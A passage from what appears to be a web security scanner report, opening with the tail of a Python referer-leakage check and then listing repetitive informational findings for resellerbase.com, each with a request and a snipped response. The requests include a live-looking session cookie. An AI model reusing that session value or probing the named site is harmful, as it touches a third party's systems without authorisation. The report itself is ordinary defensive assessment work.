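    """Return absolute http(s) hrefs whose host differs from the page's host."""
    page_host = urlsplit(page_url).hostname
    collector = LinkCollector()
    collector.feed(body)
    links = []
    for href in collector.hrefs:
        absolute = urljoin(page_url, href)  # resolve relative hrefs against the page
        parts = urlsplit(absolute)
        if parts.scheme in ("http", "https") and parts.hostname and parts.hostname != page_host:
            links.append(absolute)
    return links


def sensitive_query_params(query):
    """Parameter names in the query string that look like session or credential material."""
    names = [pair.split("=", 1)[0] for pair in query.split("&") if pair]
    return [n for n in names if any(hint in n.lower() for hint in SENSITIVE_HINTS)]


def referer_leakage(page_url, body):
    """Scanner-style check: flag when the URL has a query string AND the body
    links off-site. Returns None when either condition fails, else a finding."""
    query = urlsplit(page_url).query
    if not query:
        return None
    links = cross_domain_links(page_url, body)
    if not links:
        return None
    sensitive = sensitive_query_params(query)
    return {
        "query": query,
        "links": links,
        "hosts": sorted({urlsplit(link).hostname for link in links}),
        "sensitive_params": sensitive,
        "triage": "Medium" if sensitive else "Information",
    }


if __name__ == "__main__":
    finding = referer_leakage(SAMPLE_URL, SAMPLE_BODY)
    print("no issue" if finding is None else finding)
```

Run against the constructed sample the check reports both W3C hosts with an Information triage, exactly the situation in this section; drop the query string and it reports nothing. On the application side the fix is to stop emitting off-site links from pages reached with query strings, or to mark them rel="noreferrer"; a Referrer-Policy response header achieves the same for the whole page in current browsers.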

6.215. http://www.resellerbase.com/detail/41/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.216. http://www.resellerbase.com/detail/41/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.217. http://www.resellerbase.com/detail/42/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/42/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.218. http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/42/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.219. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.220. http://www.resellerbase.com/detail/42/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.221. http://www.resellerbase.com/detail/42/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/themes/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.222. http://www.resellerbase.com/detail/44/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/44/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.223. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.224. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.225. http://www.resellerbase.com/detail/44/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.226. http://www.resellerbase.com/detail/44/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/44/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.227. http://www.resellerbase.com/detail/45/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/45/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.228. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.229. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.230. http://www.resellerbase.com/detail/45/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.231. http://www.resellerbase.com/detail/45/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/search.php

Issue detail

The page was loaded from a URL containing a query string (keyword=search...&Submit3=Search&opt=2 in the request below). The response contains links to other domains, including http://validator.w3.org/check?uri=referer and http://jigsaw.w3.org/css-validator/check/referer (both visible in the response snippet below).

Request

GET /detail/45/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

